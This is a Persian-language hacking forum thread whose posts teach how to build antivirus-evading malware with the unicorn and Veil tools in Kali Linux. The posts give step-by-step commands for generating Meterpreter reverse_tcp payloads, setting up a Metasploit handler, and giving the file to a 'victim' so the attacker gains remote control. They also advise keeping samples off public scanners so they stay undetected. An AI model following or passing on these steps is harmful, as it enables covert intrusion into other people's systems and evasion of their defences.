رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

با سلام خدمت شما دوستان گرامی

من تازه کار با کالی رو شروع کردم ولی باید بگم که os فوق العاده ای هستش و پیشنهاد میکنم که همه نصب کنند

و از ان استفاده کنید(ضرر نمیکنید.... :D )

خب  بهتره از اصل اموزش دور نشیم در این آموزش با استفاده از ابزار unicorn در کالی لینوکس انتی  ویروس رو دور میزنیم و فایلی درست میکنیم که هیچ انتی ویروسی نشناسه

11325993_1699332256957247_1999479595_n.j

ابتدا وارد terminal میشیم و دستور زیر رو میزنیم

unicorn.sh -h

نکته اگر در دسکتاپ این فایل رو دارید باید ابتدا دستور زیر رو بزنید ( در اخر فایل رو ضمیمه میکنم)

cd Desktop

خب و بعد دستور زیر رو میزنیم

unicorn.sh windows/meterpreter/reverse_tcp ipkhodeton portdelkho nonuac

و بعد از چند ثانیه 3 تا فایل براتون درست میشه اونی که اسمش (  unicorn.c

 

رو leafpad یا هر چی دیگه باز کنید و کد های داخل شو copy کرده و سایت زیر رو باز کنید و در کادر paste کنید

 

http://www.onlinecompiler.net/ccplusplus

 

خب و حالا گزینه کامپایل رو بزنید و فایلی که بهتون داده رو دانلود کنید مثل زیر

 

Link to executable file: iHG8J98c.exe    

 

خب بعد از دانلود فایل دستورات زیر رو اجرا کنید

 

فایلتون هم میتونید در سایت زیر اسکن کنید

 

https://virusscan.jotti.org msfconsole

بعد از وارد شدن به محیط متااسپلویت دستورات معروف زیر رو بزنید

use exploit/multi/handler

set LHOST ....

set LPORT ....

set PAYLOAD windows/meterpreter/reverse_tcp

exploit

 

اینم لینک اسکن

https://virusscan.jotti.org/en-US/filescanjob/159euowzmp,bn9ewqi3xe

و حالا فایل رو بدید به قربانی تا اجرا کنه وقتی که اجرا کرد شما به سیستم قربانی وصل میشید

 فایل رو هم براتون پیوست کردم

 

البته روش های دیگری هم برای کریپت کردن یک ویروس وجود دارد که در ادامه ی همین تاپیک برای شما ضمیمه میکنم..... B)

تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشداموزش و روش هایی جدید تر و بهتررا به شما یاد خواهم داد

با تشکر B)

unicorn.zip

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 2 هفته بعد...

چگونگی کریپت کردن ویروس با کالی لینوکس

با سلام خدمت شما دوستان گرامی

خیلی از دوستان از من میپرسند که چگونه میتوانند ویروس خود را به گونه ای کریپت کنند که انتی ویروس های معمولی (مثلا نود 32 )رابایپس کند.... :D

خب یکی از ابزار های محشر کالی لینوکس که فقط مخصوص این سیستم عامل است ابزار veil نام دارد که این ابزار توانایی :

1_دور زدن انتی ویروس های معمول

2_گرفتن payload از metasploit و گرفتن نسخه ی جدید ان در زمانی که روانه ی بازار میشود

3_توانایی ساختن payload های متفاوت تا جایی که امکان دارد و........

 

چند وقت پیش ورژن (2.0.4)این ابزار منتشر شد که توانایی سازگاری با هر دو نسخه ی 32 و 64 بیتی میباشد که این خود یک خبر خوب است

اگر میخواهید این ابزار را در درون سیستم حودتان نصب کنید کافی است که دستورات زیر را در کامند لاین تایپ کنید

apt-get update
apt-get install veil

و یا از راه حل دوم در زیر برای نصب اقدام کنید

wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
cd ..
./setup.sh

من در زمان نصب  با راه حل به مشکل برخوردم و به شما راه حل دوم را پیشنهاد میکنم B)

 

دوستان عزیز این را بدانید که اسکنر های انلاین این را میدانند که 90 درصد اوقات ویروس نویس ها هستند که

ویروس های خود را در انتی ویروس های انلاین اسکن میکنند و بعد از انکه ویروس شما توسط این اسکنر ها fud نشانداده شد فایل شما را (همان ویروس را) به قیمتی گزاف به این شرکت های انتی ویروس ها میفروشند از از این راه کسب درامد مفتی میکنند......

و بعد از این که ویروس شما و روش کریپتینگ شما به تاریخ پیوست میشینند و به ریش ما میخنددند پس لطفا اگر یه وقتی با این روش ویروس خود را کریپت کردین با انتی ویروس های انلاین انرا اسکن نکنید(ازشما دوستان گرامی عاجزانه خواهش میکنم که ویروس خود را در انتی ویروس های انلاین اسکن نکنید و اینرا هم بدانید که اگر که مشاهده کنم که این روش هم مانند خیلی از روش های دیگر از بین رفت این را بدانید که دیگر هیچگونهروش  کریپتینگ چه نرم افزار و چه روش هایی دیگر را در انجمن ضمیمه نمیکنم و دیگر خودتان باید به دنبال روش برای انجام این کار باشد پس لطفا هواستون رو در مورد کار با این ابزار ها جمع کنید........ -_-

اگر که میخواهید برای فود بودن از ویروس خودتون مطمئن باشید کافیست که به ادرس nodistribute.com مراجعه کرده و

بعد از اسکن گزینه ی"Do not distribute the sample".

را در اختیار شما میگزارد که میتوانید از انها استفاده کنید........ :D

خب به سراغ اموزش میرویم:

اگر که ابزار را به تازگی نصب کرده اید میتوانید به راحتی با زدن فرمان زیر انرا اجرا کنید

./Veil

در حالت معمول بعد از باز کردن ان شما 18 عدد payload اماده برای استفاده دارید که با زدن فرمان USE میتوانید

از ان استفاده کنید

Veil1.png

درتصویر زیر ابزار veil اطلاعات بیشتری به ما میدهد که من به شما توصیه میکنم که ازpython/b64VirtualAlloc استفاده کنید که با تایپ عدد 18 میتوانید از ان استفاده کنید

Veil2.png

زمانی که payload شما اماده است دستور generate را تایپ کنید شما گزینه های دیگری نیز در ابزار 

میبینید ولی ما بعدا به ان گزینه ها میپردازیم و الان ما گزینه معمول را انتخاب میکنیم

Veil3.png

حال ما با تایپ عدد 1 گزینه ی msfvenom را انتخاب میکنیم

 

Veil4.png

حال ما باید کمی از جزئیات را در زیر تایپ کنیم

Enter metasploit payload: "windows/meterpreter/reverse_tcp"      وارد کردن payload متااکسپلویت

Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"          وارد کرد ایپی defult خودتون در اینجا

Enter value for 'LPORT': "443"                                                           وارد کردن پورت مورد نظرتون

 حال باید کمی صبر کنید تا شل کود مورد نظرتون ساخته شود

veil_15.png

حال بعد از زدن کلید  enter باید یک نام برای payload مورد نظر انتخاب کنیم که در اینجا من undetectable را انتخاب میکنم

 

Veil6.png

حال ما با تایپ کلید 1 گزینه ی Pyinstaller را انتخاب میکنیم که یک فایل اجرایی برای ما میسازد

Veil7.png

در اخر هم ما میتوانیم فایل ویروسیمان را در مسیر " /root/Veil-master/output/compiled/" پیدا کنیم

Veil8.png

خب حالا وقت به اسکن فایل رسیده است ..... :D

Veil10.png
خب در تصویر زیر میبینید که کاملا fud است (درسته که لینک اسکن قدیمی هستس ولی اینرو بدونید که این ابزار
هر چند وقت یکبار اپدیت میشود و تا وقتی که در اسکنر انلاین اسکن نشود کاملا fud باقی میماند...... B)
Veil11.png
 

تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشداموزش و روش هایی جدید تر و بهتررا به شما یاد خواهم داد (به شرط لو نرفتنا....... :P)

با تشکر B)

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 6 ماه بعد...

سلام خسته نباشی بخاطر تاپیک خوبت من دستور بعد از گیت هاب رو که میزنم ارور که نتونست فایل زیپ رو پیدا کنه میشه لطفا راهنماییم کنی؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 2 سال بعد...

درود/

دوست عزیز تاپیک سال 94 رو بالا اوردید انتظار دارید شناسایی نکنه!!!!

لطفا تاپیک های قدیمی رو بالا نیارید.

اگر درخواست باشه این بخش بروز رسانی میشه.

یا حق.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • RT3N موضوع را قفل کرد
مهمان
این موضوع برای عدم ارسال قفل گردیده است.

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...